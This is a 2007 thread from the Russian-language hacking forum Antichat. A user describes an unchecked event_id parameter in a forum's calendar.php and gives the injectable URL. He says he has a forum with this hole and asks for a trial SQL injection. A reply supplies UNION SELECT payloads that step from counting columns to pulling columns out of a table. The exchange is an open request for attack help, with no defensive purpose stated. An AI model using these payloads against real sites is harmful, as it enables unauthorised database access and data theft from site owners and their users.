Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Помогите составить запрос инъекции |
25.02.2007, 22:11
|
|
Познающий
Регистрация: 04.01.2006
Сообщений: 55
Провел на форуме:
106810
Репутация:
10
|
|
Помогите составить запрос инъекции
Вопрос знающим людям.
В скрипте calendar.php в функции cal_event_save( $type='add' ) отсутствует проверка на тип в переменной event_id
Код:
$event_id = $this->ipsclass->input['event_id'];
Далее эта переменная подставляется напрямую в запрос к БД
Код:
$this->ipsclass->DB->simple_construct( array( 'select' => '*', 'from' => 'cal_events', 'where' => "event_id=$event_id" ) );
и еще один запрос. Это позволяет модифицировать запрос к базе данных
Код:
http://path_to_forum/index.php?act=calendar&code=doedit&type=qqq&event_ id=your_SQL
Та вот имею форум с такой уязвимостью. Помогите составить какую-то пробную инъекцию, при помощи этого параметра event_id.
За ранее благодарен.
Последний раз редактировалось FoGorm; 25.02.2007 в 22:20..
|
|
|
26.02.2007, 07:04
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
Последний раз редактировалось aka PSIH; 26.02.2007 в 07:06..
|
|
|
|
26.02.2007, 07:17
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
1 'select' => '*', 'from' => 'cal_events', 'where' => "event_id=999999 union select 1,2,3,4,...,100"
2 'select' => '*', 'from' => 'cal_events', 'where' => "event_id=999999 union select 1,2,3,4,...,100 from cal_table"
3 'select' => '*', 'from' => 'cal_events', 'where' => "event_id=999999 union select 1,column,3,4,...,100 from cal_table"
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
